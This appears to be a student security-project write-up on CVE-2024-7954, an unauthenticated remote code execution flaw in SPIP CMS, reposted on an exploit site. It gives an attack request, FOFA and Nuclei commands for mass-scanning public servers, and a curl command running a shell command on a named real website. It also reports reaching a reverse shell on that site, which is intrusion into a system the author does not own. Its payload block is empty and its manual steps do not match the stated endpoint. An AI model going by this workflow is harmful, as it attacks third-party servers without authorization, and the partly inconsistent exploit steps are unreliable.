Share
## https://sploitus.com/exploit?id=258CE2BD-C301-5387-B3ED-EB38B94C7F6D
# Exploitation of Remote Code Execution Vulnerability (CVE-2024-7954)

**Software Vulnerability Testing Project**
**Submitted by:** *Shivansh Kuntal*

---

## Overview

This project demonstrates the exploitation of **CVE-2024-7954**, a critical Remote Code Execution (RCE) vulnerability affecting **SPIP CMS** through its `porte_plume` plugin.
The vulnerability allows **unauthenticated attackers** to execute arbitrary PHP code on the target server via crafted HTTP POST requests.

Testing was conducted in a **controlled local environment** and later extended to real-world reconnaissance using FOFA and Nuclei.

---

## 1. Environment Setup

A vulnerable version of **SPIP CMS**, confirmed to be affected by CVE-2024-7954, was deployed locally on an Apache server using a GitHub repository hosting known-vulnerable releases.

**Tools Used**

* Burp Suite (intercepting & modifying HTTP requests)
* Apache Web Server
* FOFA Search Engine
* Nuclei Vulnerability Scanner
* curl (CLI exploitation)

The SPIP homepage running on `localhost` validated successful installation and served as the target for exploitation.

---

## 2. Vulnerability Description

The **porte_plume** plugin (before versions 4.30-alpha2, 4.2.13, 4.1.16) is vulnerable due to insufficient sanitization of user-provided input.
Attackers can inject PHP code into specific form fields which is later rendered and executed by the server.

**Impact:**
Unauthenticated Remote Code Execution
**Severity:** Critical
**Attack Vector:** Network / HTTP POST

---

## 3. Proof of Concept (PoC)

### Malicious POST Request

```http
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL``]_BB
```

### Notes

* PHP code is injected inside the markdown formatting engine.
* Executed as the **SPIP user** on the server.
* Attack requires **no authentication**.

---

## 4. FOFA Reconnaissance

A FOFA query was used to enumerate public SPIP installations:

```
app="SPIP"
```

FOFA returned multiple metadata points:

* HTTP headers
* Titles
* IP addresses & geolocation
* Server technology stack

### Recon Value

1. **Target Enumeration:** Identify reachable SPIP CMS servers.
2. **Version Fingerprinting:** Determine if vulnerable plugin versions are active.
3. **Prioritization:** Select likely exploitable systems.
4. **Exploit Verification:** Validate endpoints using controlled payloads.
5. **Automation:** Export FOFA results into `targets.txt` for batch scanning.

A suitable real-world host identified:

```
http://www.comite-tricolore.org/
```

---

## 5. Automated Scanning with Nuclei

### Purpose

Since manual exploitation is slow, **Nuclei** was used to automate detection of CVE-2024-7954 across a large set of targets.

### Command (Custom Template)

```bash
nuclei -l targets.txt -t CVE-2024-7954.yaml
```

* `-l targets.txt` loads FOFA results
* `-t` loads custom PoC template

**Note:** Initial template returned *no matches*.

### Broad CVE Scan

```bash
nuclei -l targets.txt -t cves/
```

This scan identified one responsive target:

```
http://www.comite-tricolore.org/
```

---

## 6. Manual Validation & Exploitation

### Step 1 โ€” Inspect Vulnerable Endpoint

Visit:

```
http://www.comite-tricolore.org/spip.php?page=contact
```

Confirmed:

* Input fields for name, email, message
* POST request handler suitable for payload injection

### Step 2 โ€” Inject PHP Payload

Using Burp Suite or curl, modify the `message` parameter:

**Payload**

```php

```

### Step 3 โ€” Trigger Command Execution

Visit:

```
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id
```

Or using curl:

```bash
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"
```

Output confirmed remote command execution.

### Step 4 โ€” Reverse Shell (Final Access)

A crafted payload enables a reverse shell callback, allowing:

* `whoami`
* `ls`
* full interactive shell access

---

## 7. Critical Observations

* **Unauthenticated exploit** increases severity dramatically.
* **Input sanitization failure** in the plugin is the core issue.
* Once PHP is injected and rendered, **complete server compromise** is possible.
* Reverse shell โ†’ potential privilege escalation โ†’ server takeover.
* Attack is trivial to automate with curl, Python scripts, or Nuclei.

---

## 8. Conclusion

This project demonstrates the full exploitation chain for **CVE-2024-7954**, from reconnaissance to obtaining an interactive shell.

### Exploitation Path

1. Recon (FOFA)
2. Automated Scanning (Nuclei)
3. Manual Payload Injection
4. Verified Code Execution
5. Reverse Shell Access

### Security Lessons

* Strict input validation is mandatory for all user-controlled data.
* Plugins must follow secure coding practices.
* Organizations must apply security patches promptly.
* Regular vulnerability assessments are essential to prevent RCE attacks.

This vulnerability highlights how a seemingly harmless text formatting plugin can create a **complete system compromise** when improperly secured.